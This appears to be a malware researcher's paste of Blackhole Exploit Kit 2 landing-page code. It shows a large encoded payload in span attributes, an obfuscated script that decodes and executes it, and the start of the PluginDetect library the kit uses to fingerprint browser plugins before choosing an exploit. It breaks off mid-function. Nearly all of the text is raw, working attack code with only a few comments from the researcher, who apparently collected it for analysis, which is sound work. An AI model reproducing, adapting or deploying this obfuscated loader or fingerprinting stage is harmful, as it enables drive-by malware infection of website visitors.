87="g4c)4151454i1m#4550451f2b*552b4n494e!444f4n1m4f^4e4245464f_4i454l4e4c$4f41442d46(4l4e434k49@4f4e1g1h53&4i454k4l4i+4e181a1a2b%552b4k4i51)534m414i18#4i41242d1a*1m1n1n1m1m!1n1n202341^422322261m_4550451a1k$4i41232d44(4f434l4d45@4e4k1m434i&45414k452l+4c454d454e%4k1g1a4f42)4a45434k1a#1h2b4i4123*1m4j454k2h" 81="4c4l47494e_1g4b1k411h$55471m494e(4j4k414c4c@45442d4e1e&1e482f212a+1g4e2f202a%1g471m4e41)4m384c4l47#494e37424a*2f1l201m22!2a1l211h1h^55454c4j45_53422d441m$47454k2h3g(371g471m4g@4i4f47312k&3j203l1h54+54441m4745%4k2h3g371g)471m4g4i4f#47312k3j21*3l1h2b432d!1n2d3k4j1i^1g3j3k443k_1m3l1j1h1n$472b4k4i51(534" 12="1a1h2a20(1k412d4e41@4m4947414k&4f4i1m4g4c+4l47494e4j%1k472d1a1a)1k461k421k#4d2b464f4i*1g462d202b!462c411m4c^454e474k48_2b461j1j1h$534d2d413j(463l1m4445@4j434i494g&4k494f4e54+54472b422d%413j463l1m)4e414d4554#54472b4946*1g1g481m4k!454j4k1g4d^1h1e1e1g19_445454441m$4k454j4k1g(3a45472l50@4g1m4c4546&4k2j4" 0="!4k4i51534m^414i18384c_4l47494e2k$454k45434k(2d534m454i@4j494f4e2a&1a201m271m+281a1k4e41%4d452a1a38)4c4l47494e#2k454k4543*4k1a1k4841!4e444c454i^2a464l4e43_4k494f4e1g$431k421k41(1h534i454k@4l4i4e1846&4l4e434k49+4f4e1g1h53%431g421k41)1h55551k49#4j2k454649*4e45442a46!4l4e434k49^4f4e1g421h_534i454k4l$4i" 29="i*1m4f43501a!3l2b464f4i^1g462d202b_462c4a1m4c$454e474k48(2b461j1j1h@5349461g43&1m47454k2h+3g371g4a3j%463l1h1h53)431m2h434k#494m453g2l*4e41424c45!442d4k4i4l^452b424i45_414b555555$431m494j2n(45434b4f2d@1g1n2n4543&4b4f1n491h+1m4k454j4k%1g481h1e1e)1g1n2n4543#4b4f3k4j1i*3k1n3k4j1i!3k441n491h^1m4k454j4k_1" 48="4f44454j1h_53464f4i1g$422d441m44(494m1m4348@494c44364f&44454j1m4c+454e474k48%1l212b422e)2d202b421l#1l1h53432d*441m44494m!1m4348494c^44364f4445_4j3j423l2b$49461g431e(1e431m4348@494c44364f&44454j1h53+464f4i1g48%2d431m4348)494c44364f#44454j1m4c*454e474k48!1l212b482e^2d202b481l_1l1h53472d$431m434849(4c4" 15="471g4b1h2f_3j4b3l2a4b$2b464f4i1g(442d202b44@2c4a1m4c45&4e474k482b+441j1j1h53%49461g1g46)2d451m4841#4j35494d45*3c514g451g!4a3j443l1h^1h1e1e1g46_2d461m454e$41424c4544(384c4l4749@4e1h1h534c&2d461m4445+4j434i494g%4k494f4e54)54482b412d#461m4e414d*455454482b!49461g421m^4k454j4k1g_4c1h545442$1m4k454j4k(1g4" 83="1m1c%212e481h1h)53482d3a45#472l504g1m*1c21555555!43414k4348^1g491h5355_471m494e4j$4k414c4c45(442d482f21@2a1g422f20&2a1l211h55+49461g1947%1m4m454i4j)494f4e1h53#471m4m454i*4j494f4e2d!441m464f4i^4d414k364l_4d1g481h55$471m31363b(3c2h34342l@2k3j4b3l2d&471m494e4j+4k414c4c45%4455551k52)522a205555#2b384c4l4" 19="e444f4n1m$2h434k494m(453g37424a@45434k1k47&454k2h3g37+2a464l4e43%4k494f4e1g)411h534m41#4i18462d4e*4l4c4c1k44!1k422d4k48^494j1k432d_53552b4k4i$5153462d4e(454n18421m@2h3g371g41&1h5543414k+43481g441h%53554i454k)4l4i4e1846#551k434f4e*4m454i4k2m!4l4e434j2a^464l4e434k_494f4e1g46$1h534m414i(18411k471k@441k" 21="e43)4k494f4e1g#451k421k44*1h534m414i!18411k432b^49461g451h_5349461g45$3j423j203l(3l2d2d2154@54441h5346&4f4i1g412d+202b412c42%1m4c454e47)4k482b412d#411j221h53*453j423j41!3l3l2d423j^411j213l55_55464f4i1g$4118494e18(451h53432d@453j413l2b&49461g431e+1e433j423j%203l3l2d2d)211h534k48#494j1m494e*494k37424a" 51="f*4e1g1h534m!414i18432d^4k48494j1k_411k422b49$461g19431m(4n494e344f@414445441h&534i454k4l+4i4e554946%1g431m3f34)464l4e434j#1e1e431m3f*34464l4e43!4j1m4c454e^474k481e1e_431m3f3446$4l4e434j3j(431m3f3446@4l4e434j1m&4c454e474k+481l213l19%2d2d4e4l4c)4c1h534i45#4k4l4i4e55*464f4i1g41!18494e1843^1h53422d43_3" 62="j*4553471m41!4g4g454e44^2j48494c44_1g411h5549$461g441h53(471m4i454d@4f4m452j48&494c441g44+1h5555454c%4j45535555)1k494e4j45#4i4k303c35*342a464l4e!434k494f4e^1g471k421k_481k411k4c$1h534m414i(184d1k4e2d@444f434l4d&454e4k1k4b+2d4k48494j%1k4h1k4g2d)4e1m434i45#414k452l4c*454d454e4k!1g1a4j4g41^4e1a1h1k4f_1" 23="424a1g43(1k3j1a1c1a@1k433l1h2b&464f4i1g46+18494e1843%1m384c4l47)494e4j1h53#49461g431m*384c4l4749!4e4j3j463l^1h53431m49_4e494k3742$4a1g431m38(4c4l47494e@4j3j463l1k&3j1a1c1a1k+431k1a1c1c%1a1k431m38)4c4l47494e#4j3j463l3l*1k211h5555!2b431m373b^2d2120202b_49461g421h$534m414i18(442d3j1a3f@494e1a1k21&1k1a3" 46="f4e45+2l4d4g4k51%2k494m1h53)411m4f4e2k#4f4e452l4d*4g4k512k49!4m1g1h5555^1k4n494e34_4f41444544$2a46414c4j(451k1c1c4f@4e3f494e44&4f4n344f41+4445442a46%4l4e434k49)4f4e1g411h#534i454k4l*4i4e18464l!4e434k494f^4e1g421h53_49461g411m$4n494e344f(414445441h@53411m4341&4c4c1g421h+55454c4j45%53411m4638)4l4j481g" 4="1h2f1g441m_494j2k4546$494e45441g(431h2f4e45@4n183a4547&2l504g1g43+1h2a441m47%454k364l4d)3a4547501h#1m45504543*1g421h2a4e!4l4c4c2b4i^454k4l4i4e_18412f413j$203l2a4e4l(4c4c551k43@4f4d4g414i&45364l4d4j+2a464l4e43%4k494f4e1g)481k461k44#1h534m414i*18452d4k48!494j1k431k^421k411k47_2d4g414i4j$45314e4k2b(494" 11="!4i454k4l4i^4e18465555_55554i454k$4l4i4e184e(4l4c4c5555@1k46494e44&36414m384c+4l47494e2a%464l4e434k)494f4e1g4c#1k451k431h*534m414i18!4a2d4k4849^4j1k482d4e_454n183a45$472l504g1g(4c1k1a491a@1h1k442d1g&194a1m494j+2k4546494e%45441g451h)5454451h2f#1n3k441n2a*201k4b2d43!2f4e454n18^3a45472l50_4g1g431k1a$49" 66="!4e474k482b^4f2d4f1j22_1h5349461g$1n3j3m3k4j(3l1n1m4k45@4j4k1g423j&4f1j213l1h+1h534h1j2d%423j4f3l1j)1f2d1a1f1j#423j4f1j21*3l1j1f1a18!1f55554h1j^2d1a2e1a2b_464f4i1g4f$2d202b4f2c(481m4c454e@474k482b4f&2d4f1j221h+5349461g1n%3j3m3k4j3l)1n1m4k454j#4k1g483j4f*1j213l1h1h!534h1j2d46^1j1f4g414i_414d184e41$4d" 56="1e1e1g19(431m494j31@2l5454431m&47454k2k37+354f424a1g%4d1h1m4i45)4144513b4k#414k452d2d*241h1h5349!461g194d1m^4n494e344f_414445441e$1e431m4n49(4e344f4144@45441h534i&454k4l4i4e+1821554946%1g4d1m4n49)4e344f4144#45441e1e43*1m494j364l!4d1g421h1h^5349461g19_431m494j36$4l4d1g4d1m(434f4l4e4k@1h1h534d1m&434f4" 64="4e452b&424f4i4445+4i1l4j4k51%4c452a4e4f)4e452b4g41#4444494e47*2a204g502b!4d414i4749^4e2a204g50_2b4m494j49$42494c494k(512a4m494j@49424c452b&1a2b49461g+194b1m494j%2k4546494e)45441g411h#1h53412d1a*1a5549461g!4b1m494j3b^4k4i494e47_1g471h1e1e$1g1n3j3m3k(4j3l1n1h1m@4k454j4k1g&471h1h5347+2d471m4k4f%344f4n4" 24="54143+1a1k221k1a%34494e4l50)1a1k231k1a#2m4i45452i*3b2k1a1k24!1k1a493848^4f4e451a1k_22211m211k$1a49384f44(1a1k22211m@221k1a4938&41441a1k22+211m231k1a%3f494e1m1i)2j2l1a1k22#221m211k1a*3f494e1m1i!354f42494c^451a1k2222_1m221k1a38$4f434b454k(3k3k4j1i38@2j1a1k2222&1m231k1a1a+1k2120203l%2b464f4i1g)462d441m" 61="481h%535555472d)1g4a1m4745#4k2l4c454d*454e4k4j2i!513c414736^414d451g1a_424f44511a$1h3j203l54(544a1m424f@44511h2b49&461g471h53+49461g471m%46494i4j4k)2j48494c44#1e1e461m49*4j2k454649!4e45441g47^1m494e4j45_4i4k2i4546$4f4i451h1h(53471m494e@4j454i4k2i&45464f4i45+1g411k471m%46494i4j4k)2j48494c44#1h55454c4" 91="4i#41201m4k51*4g452d212b!4i41201m4f^4g454e1g1h_2b4i41201m$3f4i494k45(1g4i41221m@4i454j4g4f&4e4j452i4f+44511h2b4i%41201m3b41)4m453c4f2m#494c451g4i*41241k221h!2b4i41201m^2j4c4f4j45_1g1h2b5543$414k43481g(451h53554k@4i51534n49&4k481g4i41+211h534j48%454c4c4550)45434l4k45#1g4i41241h*2b55554341!4k43481g45^" 32="h1n)491h1m4k45#4j4k1g491h*2b431m4m45!4i3b414641^4i492d431m_494j3b4146$414i491e1e(1g1n3e454i@4j494f4e3k&4j1i3k1n3k+4j1i1g3k44%3j3k443k1m)3l1i1h1n49#1h1m4k454j*4k1g491h2f!431m464f4i^4d414k364l_4d1g3a4547$2l504g1m1c(211h2a4e4l@4c4c2b431m&494j374g45+4i412d1g1n%374g454i41)3k4j1i3j3k#1n3l2f3k4j*1i1g3k441j" 37="424c45441e_1e44192d2d$1a4a414m41(1a1h53411m@4j4k414k4l&4j2d1l222b+4i454k4l4i%4e18415541)1m4j4k414k#4l4j2d212b*4i454k4l4i!4e1841551k^46384l4j48_2a464l4e43$4k494f4e1g(421k411h53@4m414i1843&2d4k48494j+2b49461g43%1m494j2h4i)4i41511g41#1h1e1e1g43*1m494j2m4l!4e431g421h^54541g431m_494j2h4i4i$41511g421h(1e1" 7="d*414k364l4d!2a464l4e43^4k494f4e1g_421k431h53$4m414i1844(2d4k48494j@1k411k452b&49461g1944+1m494j3b4k%4i364l4d1g)421h1h534i#454k4l4i4e*184e4l4c4c!5549461g19^441m494j36_4l4d1g431h$1h53432d24(55431l1l2b@452d421m4i&454g4c4143+451g1n3k4j%1n471k1a1a)1h1m4j4g4c#494k1g441m*4j4g4c494k!364l4d3a45^47501h1m43_4" 68="c454d+454e4k1g1a%44494m1a1h)2b4b1m4449#4m1m49442d*4b1m44494m!312k554b1m^4j454k3b4k_514c451g4b$1m44494m1k(431m434f4e@43414k1g3j&1a4n49444k+481a1k4b1m%44494m3f49)444k481j1a#4g501a1k1a*4845494748!4k1a1k1g4b^1m4g4c4l47_494e3b4952$451j231h1j(1a4g501a1k@1a464f4e4k&3b4952451a+1k1g4b1m4g%4c4l47494e)3b495245" 26="1a48454144_1a1h3j203l$5454444f43(4l4d454e4k@1m47454k2l&4c454d454e+4k4j2i513c%414736414d)451g1a424f#44511a1h3j*203l545444!4f434l4d45^4e4k1m424f_445154544e$4l4c4c1h2b(431m494j31@2l2d1g4e45&4n182m4l4e+434k494f4e%1g1a4i454k)4l4i4e181a#1j451j1a1i*2g43433n4f!4e192g1i1a^1j451j1a46_414c4j451a$1h1h1g1h2b(431" 27="m4m454i@312l2d431m&494j312l1e+1e1g1n353b%312l3k4j1i)1g3k441j3k#1m2f3k441i*1h1n491h1m!4k454j4k1g^491h2f4g41_4i4j452m4c$4f414k1g3a(45472l504g@1m1c211k21&201h2a4e4l+4c4c2b431m%2h434k494m)453g2l4e41#424c45442d*46414c4j45!2b49461g43^1m494j312l_1h534m414i$18461k4a2d(3j1a354j50@4d4c221m3g&3534303c3c+381a1k" 41="82d53552b$49461g451m(4j4k414k4l@4j2c201h53&4i454k4l4i+4e184e4l4c%4c552b462d)451m4g4c4l#47494e2b49*461g461m47!454k3e454i^4j494f4e2k_4f4e45192d$211h53461m(47454k3e45@4i4j494f4e&1g4e4l4c4c+1k441k431h%2b49461g46)1m47454k3e#454i4j494f*4e2k4f4e45!2d2d2d4e4l^4c4c1h5346_1m47454k3e$454i4j494f(4e2k4f4e45@2d21" 71="a4g501a@1k1a4c494e&4530454947+484k1a1k1g%4b1m4g4c4l)47494e3b49#52451j231h*1j1a4g501a!1k1a4m454i^4k4943414c_2h4c49474e$1a1k1a4241(4j454c494e@451a1k1a44&494j4g4c41+511a1k1a49%4e4c494e45)1a3l1h1h2b#4k4i51534g*1m494e4e45!4i303c3534^2d4h554341_4k43481g4d$1h53552b4k(4i51534b1m@44494m1m41&4g4g454e44+2j4849" 39="4k4l%4i4e55431m)43414c4c1g#423j413l1h*2b423j413l!2d4e4l4c4c^5555551k43_414c4c2a46$4l4e434k49(4f4e1g431h@534m414i18&422d4k4849+4j1k412d42%1m494j2h4i)4i41511g43#1h2f431m4c*454e474k48!2a1l212b49^461g412e20_1e1e421m49$4j2m4l4e43(1g433j203l@1h1h53433j&203l1g421k+412e212f43%3j213l2a20)1k412e222f#433j223l2" 5="61g451m@494j3b4k4i&364l4d1g48+1h1e1e451m%494j3b4k4i)364l4d1g46#1h1h534946*1g451m494j!2k4546494e^45441g441h_1e1e441m43$4f4d4g414i(45364l4d4j@1h534i454k&4l4i4e1844+1m434f4d4g%414i45364l)4d4j1g481k#461h55432d*481m4j4g4c!494k1g451m^4j4g4c494k_364l4d3a45$47501h2b42(2d461m4j4g@4c494k1g45&1m4j4g4c49+4k364l" 25="4c#454e474k48*1l222b462e!2d202b462d^461l221h53_49461g443j$463l1e1e4e(454n183a45@472l504g1g&443j463l1k+1a491a1h1m%4k454j4k1g)421h1h5343#1m373b2d44*3j461j213l!2b424i4541^4b55555543_1m434f4e4m$454i4k2m4l(4e434j1g43@1h2b431m48&4541442d1g+444f434l4d%454e4k1m47)454k2l4c45#4d454e4k4j*2i513c4147!36414d451g^" 45="1h53431g(1h5555551k@3f34464l4e&434j202a3j+3l1k3f3446%4l4e434j2a)3j3l1k4i4l#4e3f34464l*4e434j2a46!4l4e434k49^4f4e1g411h_534m414i18$422d53552b(411m4n494e@344f414445&442d4k4i4l+452b411m43%414c4c2h4i)4i41511g41#1m3f34464l*4e434j201h!2b411m4341^4c4c2h4i4i_41511g411m$3f34464l4e(434j1h2b49@461g411m4f&4e2k4" 43="k2a)464l4e434k#494f4e1g44*1k431h534m!414i18452d^4k48494j1k_412d4n494e$444f4n1k42(2b49461g45@1m494j2m4l&4e431g431h+1h5349461g%411m414444)2l4m454e4k#34494j4k45*4e454i1h53!411m414444^2l4m454e4k_34494j4k45$4e454i1g44(1k431k4641@4c4j451h55&454c4j4553+49461g411m%414k4k4143)482l4m454e#4k1h53411m*414k4k4143" 40="a*201k412e23!2f433j233l^2a201h5545_4c4j455349$461g421m49(4j2m4l4e43@1g431h1h53&431g421h55+55551k4745%4k3e454i4j)494f4e2k45#4c494d494k*454i2a1a1k!1a1k1c1c47^454k3e454i_4j494f4e2a$464l4e434k(494f4e1g41@1h534i454k&4l4i4e1846+4l4e434k49%4f4e1g471k)441k431h53#4m414i1845*2d411m494e!494k1g471h^1k461k421k_4" 17="4i4j%494f4e5454)191g452d48#1m47454k36*4l4d1g461m!4m454i4j49^4f4e1h1h1h_534i454k4l$4i4e184255(49461g1942@1h534i454k&4l4i4e1845+55452d481m%464f4i4d41)4k364l4d1g#451h2b422d*481m464f4i!4d414k364l^4d1g421h2b_442d421m4j$4g4c494k1g(481m4j4g4c@494k364l4d&3a4547501h+2b472d451m%4j4g4c494k)1g481m4j4g#4c494k364" 65="54i)2j414j451g#1h1m4i454g*4c4143451g!1n3k4j1n47^1k1a1a1h2b_4h2d461j47$1j1f184n49(444k482d1a@1f1j4b1m4g&4c4l47494e+3b4952451j%1f1a184845)4947484k2d#1a1f1j4b1m*4g4c4l4749!4e3b495245^1j1f1a181f_2b4h1j2d1f$4j4k514c45(2d1a1f1j49@1j1f44494j&4g4c41512a+494e4c494e%452b1a181f)2b464f4i1g#4f2d202b4f*2c421m4c45" 3="51#4g454f4618*422d2d1a4j!4k4i494e47^1a1e1e1g1n_3k441n1h1m$4k454j4k1g(421h1h551k@47454k364l&4d3a454750+2a1n3j3k44%3l3j3k443k)1m3k3n1k1l#3l1i1n1k4j*4g4c494k36!4l4d3a4547^502a1n3j3k_1m3k3n1k1l$3l1n471k47(454k364l4d@2a464l4e43&4k494f4e1g+421k431h53%4m414i1844)2d4k48494j#1k412d441m*494j3b4k4i!364l4d1g42^" 90="c4l43+4b514g454k%4j4g454k4j)494k4k494e#471m434f4d*1n4c494e4b!4j1n4i454k^4l4i4e1l4n_454j4k1m4g$484g2f484a(494l464d2d@2325204120&2520252328+1e4e4h482d%2024202223)2823242327#2323202623*2520242023!1e4e4b452d^20241e454a_472d51524f$1e4e504j47(494m452d4b@4h484n511a&1k46414c4j+451h2b4i41%221m4j454e)441g1h2b" 75="4i454k&4l4i4e1821+555549461g%451m47454k)35494d452l#4e41424c45*44384c4l47!494e1g431k^461h1h534i_454k4l4i4e$1821554i45(4k4l4i4e18@20551k4745&4k3e454i4j+494f4e2a46%4l4e434k49)4f4e1g4c1k#4a1h534m41*4i18472d4k!48494j1k44^2d471m1c1k_491k461k4d$1k4e1k422d(4e4l4c4c1k@482d4e4l4c&4c1k4b2d47+1m4d494d45%3c514g4" 13="f4e4k+45504k1j3a%45472l504g)1m4i494748#4k2j4f4e4k*45504k1h1h!1h54541g48^1m4k454j4k_1g421h1e1e$1g19445454(441m4k454j@4k1g3a4547&2l504g1m4c+45464k2j4f%4e4k45504k)1j3a45472l#504g1m4i49*47484k2j4f!4e4k45504k^1h1h1h1h53_49461g194b$5454191g4b(1m4k454j4k@1g4d1h5454&4b1m4k454j+4k1g421h1h%1h534i454k)4l4i4e18" 38="e421m4c@454e474k48&2e201e1e43+1m494j2m4l%4e431g423j)203l1h1h1h#1h53411m4g*4l4j481g42!1h55551k43^414c4c2h4i_4i41512a46$4l4e434k49(4f4e1g421h@534m414i18&432d4k4849+4j1k412b49%461g431m49)4j2h4i4i41#511g421h1h*53464f4i1g!412d202b41^2c421m4c45_4e474k482b$411j1j1h53(49461g423j@413l2d2d2d&4e4l4c4c1h+534i45" 20="422d1n&3m3j3k1c3l+3j3k1c3l1n%1k432d4k48)494j2b464f#4i1g411849*4e18461h53!49461g421m^4k454j4k1g_411h1h534k$4i5153472d(411m4j4c49@43451g221h&2b49461g47+1m4c454e47%4k482e201e)1e19463j47#3l1h53463j*473l2d463j!413l1g461h^2b44454c45_4k4518463j$413l555543(414k43481g@441h535555&55551k494e+494k37424a%2a464l4" 67="452d1a1f(1j483j4f3l@1j1f1a184m&414c4l452d+1a1f1j483j%4f1j213l1j)1f1a181n2e#1f55554h1j*2d411j461j!1a1n1a1j47^1j1a2e1a55_454c4j4553$4h2d415549(461g194b1m@44494m1h53&4a2d4e1m47+454k2l4c45%4d454e4k2i)5131441g4b#1m44494m31*2k1h2b4946!1g4a1h534b^1m44494m2d_4a55454c4j$45534b1m44(494m2d4e1m@434i45414k&452l4" 74="l21212j2m$1l2h22242k(1l24242425@2523252420&2020201a1k+31363b3c2h%34342l2k2a)53551k4g4c#4l47494e30*414j35494d!453c514g45^2a464l4e43_4k494f4e1g$441k431k46(1h534m414i@18422d4k48&494j1k452d+421m1c1k41%2b464f4i1g)4118494e18#441h534946*1g443j413l!1e1e443j41^3l1m4k514g_451e1e443j$413l1m4k51(4g452d2d43@1h53" 73="h*55551k384c!4l47494e4j^2a5341444f_42454i4541$44454i2a53(4d494d453c@514g452a1a&414g4g4c49+43414k494f%4e1n4g4446)1a1k4e414m#384c4l4749*4e37424a2a!4e4l4c4c1k^4g4i4f4731_2k2a3j1a2h$434i4f382k(2m1m382k2m@1a1k1a382k&2m1m384446+2j4k4i4c1a%3l1k434c41)4j4j312k2a#1a434c4j49*442a2j2h28!2h29272820^1l2228202k_1" 54="e18)1l21551k47#454k3c4147*3b4k414k4l!4j2a464l4e^434k494f4e_1g4d1k471k$411k421h53(4m414i1843@2d4k48494j&1k461k4b2d+4d1m4j4g41%4e1k4c2d43)1m47454k3f#49444k481g*4b1h1k482d!411m4j4g41^4e1k4a2d43_1m47454k3f$49444k481g(481h1k442d@471m4j4g41&4e1k492d43+1m47454k3f%49444k481g)441h2b4946#1g194b5454*1948545419" 59="1j221h534k_4i5153463j$473j413l3l(2d473j411j@213l554341&4k43481g44+1h53555555%551k494e4j)454i4k2k49#4m314e2i4f*44512a464l!4e434k494f^4e1g411k49_1h534m414i$18481k462d(4k48494j1k@422d1a4g44&2323292923+2329291a1k%442d4e4l4c)4c1k4a2d49#2f4n494e44*4f4n1m4k4f!4g1m444f43^4l4d454e4k_2a4n494e44$4f4n1m444f(434" 92="1h53555543_414k43481g$451h535555(43414k4348@1g454i4i4e&4f1h535544+4f434l4d45%4e4k1m4n4i)494k451g1f#1f1h2b4j45*4k3c494d45!4f4l4k1g45^4e443n4i45_44494i4543$4k1k262020(20201h2b" 76="51k)411k432b49#461g441m49*4j3b4k4i49!4e471g4a1h^1h534a2d4a_1m4i454g4c$4143451g1n(3k4j1n471k@1a1a1h2b49&461g4a1h53+4b2d4a5555%454c4j4553)4a2d4e4l4c#4c5549461g*441m494j2k!4546494e45^441g471m31_363b3c2h34$342l2k3j4b(3l1h1h5347@1m494e4j4k&414c4c4544+2d471m3136%3b3c2h3434)2l2k3j4b3l#2b4i454k4l*4i4e554946" 88="!4k4k4i4942^4l4k451g1a_49441a1k4i$41231h2b4i(41231m4j45@4k2h4k4k4i&49424l4k45+1g1a434c41%4j4j49441a)1k1a434c4j#49442a2i2k*29262j2525!261l26252h^231l21212k_201l292823$2h1l20202j(20242m2j22@292l23261a&1h2b4k4i51+534m414i18%4i41202d4i)41231m2j4i#45414k4537*424a45434k!1g1a41444f^441a1m434f_4e43414k1g$1a" 2="22d2d+1a464l4e43%4k494f4e1a)551k494j3b#4k4i494e47*2a464l4e43!4k494f4e1g^421h534i45_4k4l4i4e18$4k514g454f(4618422d2d@1a4j4k4i49&4e471a551k+494j364l4d%2a464l4e43)4k494f4e1g#421h534i45*4k4l4i4e18!4k514g454f^4618422d2d_1a4e4l4d42$454i1a551k(494j3b4k4i@364l4d2a46&4l4e434k49+4f4e1g421h%534i454k4l)4i4e1g4k" 72="4c44%1g4g1h5543)414k43481g#4d1h53552b*4i454k4l4i!4e534j4g41^4e2a4g1k4n_494e344f41$4445442a4b(1m4n494e34@4f41444544&1k4k414736+414d452a47%1k4f4l4k45)4i303c3534#2a4h55554i*454k4l4i4e!534j4g414e^2a4e4l4c4c_1k4n494e34$4f41444544(2a4b1m4n49@4e344f4144&45441k4k41+4736414d45%2a1a1a1k4f)4l4k454i30#3c35342a4" 18="l*4d3a454750!1h2b464f4i^1g412d202b_412c441m4c$454e474k48(2b411j1j1h@5349461g43&2e1l211e1e+412e431e1e%443j413l19)2d1a201a1h#534i454k4l*4i4e184255!49461g473j^413l192d44_3j413l1h53$49461g432d(2d1l211h53@432d415549&461g443j41+3l192d1a20%1a1h534i45)4k4l4i4e18#425555554i*454k4l4i4e!1845551k2h^3g372a4n49_4" 63="k4a1k462d$1a2c1a2b4m(414i18432d@3j1a4f4l4k&4c494e453b+4k514c451a%1k1a4e4f4e)451a1k1a42#4f4i44454i*3b4k514c45!1a1k1a4e4f^4e451a1k1a_4g41444449$4e471a1k1a(204g501a1k@1a4d414i47&494e1a1k1a+204g501a1k%1a4m494j49)42494c494k#511a1k1a4m*494j49424c!451a3l2b4m^414i18492d_1a4f4l4k4c$494e451l4j(4k514c452a@4e4f" 9="1g201k&241h1m4a4f+494e1g1a1k%1a1h551k1c)1c48414j35#494d453c51*4g452a464l!4e434k494f^4e1g411h53_4i454k4l4i$4e18464l4e(434k494f4e@1g431h5349&461g19411m+494j312l1e%1e431h534m)414i18461k#451k421k44*2d411m494j!2h4i4i4151^1g431h2f43_2a1g411m49$4j3b4k4i49(4e471g431h@2f3j433l2a&3j3l1h2b46+4f4i1g422d%202b422" 14="41#3j463l5555*554i454k4l!4i4e184e4l^4c4c551k47_454k35494d$452l4e4142(4c4544384c@4l47494e2a&464l4e434k+494f4e1g4b%1k4d1k431h)534m414i18#452d4k4849*4j1k461k42!2d4e454n18^3a45472l50_4g1g4d1k1a$491a1h1k48(2d1a1a1k47@2d432f4e45&4n183a4547+2l504g1g43%1k1a491a1h)2a201k411k#4c1k441k4a*2d451m494j!3b4k4i494e^"></span><script>
  216. if(zxc){var q=asd();
  217. var s="",a="";
  218. for(i=0;i<93;i++){
  219. s+=asd2();
  220. }
  221. s=s.replace(/[^a-z0-9]+/g,"");
  222. for(i=0;i<s.length;i+=2){
  223. window.asd3();
  224. }
  225. try{window.document.body=s}catch(awt){asd4()}}
  226. </script></body></html>
  227.  
  228. ---------------------------------------------------------------------------------------
  229.  
  230. // BHEK2 Plugin Detect.....these morons never learns...
  231. // I won't spend my time to PDF and jar I aimed straingt PE infectors..
  232. // You guys can go ahead with jar and PDF
  233. // rgds, @unixfreaxjp
  234.  
  235. try {
  236. var PluginDetect = {
  237. version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
  238. return function (){
  239. c(b, a)
  240. }
  241. }
  242. , isDefined : function (b){
  243. return typeof b != "undefined"
  244. }
  245. , isArray : function (b){
  246. return (/array/i).test(Object.prototype.toString.call(b))
  247. }
  248. , isFunc : function (b){
  249. return typeof b == "function"
  250. }
  251. , isString : function (b){
  252. return typeof b == "string"
  253. }
  254. , isNum : function (b){
  255. return typeof b == "number"
  256. }
  257. , isStrNum : function (b){
  258. return (typeof b == "string" && (/\d/).test(b))
  259. }
  260. , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
  261. getNum : function (b, c){
  262. var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
  263. exec(b) : null;
  264. return a ? a[0] : null
  265. }
  266. , compareNums : function (h, f, d){
  267. var e = this , c, b, a, g = parseInt;
  268. if (e.isStrNum(h) && e.isStrNum(f)){
  269. if (e.isDefined(d) && d.compareNums){
  270. return d.compareNums(h, f)
  271. }
  272. c = h.split(e.splitNumRegx);
  273. b = f.split(e.splitNumRegx);
  274. for (a = 0; a < Math.min(c.length, b.length);
  275. a ++ ){
  276. if (g(c[a], 10) > g(b[a], 10)){
  277. return 1
  278. }
  279. if (g(c[a], 10) < g(b[a], 10)){
  280. return - 1
  281. }
  282. }
  283. }
  284. return 0
  285. }
  286. , formatNum : function (b, c){
  287. var d = this , a, e;
  288. if (!d.isStrNum(b)){
  289. return null
  290. }
  291. if (!d.isNum(c)){
  292. c = 4
  293. }
  294. c--;
  295. e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
  296. for (a = 0; a < 4; a ++ ){
  297. if (/^(0+)(.+)$/.test(e[a])){
  298. e[a] = RegExp.$2
  299. }
  300. if (a > c ||! (/\d/).test(e[a])){
  301. e[a] = "0"
  302. }
  303. }
  304. return e.slice(0, 4).join(",")
  305. }
  306. , $$hasMimeType : function (a){
  307. return function (c){
  308. if (!a.isIE && c){
  309. var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
  310. for (b = 0; b < d.length; b ++ ){
  311. if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
  312. f = navigator.mimeTypes[d[b]];
  313. e = f ? f.enabledPlugin : 0;
  314. if (e && (e.name || e.description)){
  315. return f
  316. }
  317. }
  318. }
  319. }
  320. return null
  321. }
  322. }
  323. , findNavPlugin : function (l, e, c){
  324. var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
  325. new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
  326. for (f = 0; f < a.length; f ++ ){
  327. m = a[f].description || g;
  328. b = a[f].name || g;
  329. if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
  330. test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
  331. if (!k ||! (k.test(m) || k.test(b))){
  332. return a[f]
  333. }
  334. }
  335. }
  336. return null
  337. }
  338. , getMimeEnabledPlugin : function (k, m, c){
  339. var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
  340. l, d, j = e.isString(k) ? [k] : k;
  341. for (d = 0; d < j.length; d ++ ){
  342. if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
  343. l = f.description || h;
  344. a = f.name || h;
  345. if (b.test(l) || b.test(a)){
  346. if (!g ||! (g.test(l) || g.test(a))){
  347. return f
  348. }
  349. }
  350. }
  351. }
  352. return 0
  353. }
  354. , getPluginFileVersion : function (f, b){
  355. var h = this , e, d, g, a, c =- 1;
  356. if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
  357. return b
  358. }
  359. if (!b){
  360. return e
  361. }
  362. e = h.formatNum(e);
  363. b = h.formatNum(b);
  364. d = b.split(h.splitNumRegx);
  365. g = e.split(h.splitNumRegx);
  366. for (a = 0; a < d.length; a ++ ){
  367. if (c >- 1 && a > c && d[a] != "0"){
  368. return b
  369. }
  370. if (g[a] != d[a]){
  371. if (c ==- 1){
  372. c = a
  373. }
  374. if (d[a] != "0"){
  375. return b
  376. }
  377. }
  378. }
  379. return e
  380. }
  381. , AXO : window.ActiveXObject, getAXO : function (a){
  382. var f = null, d, b = this , c = {
  383. }
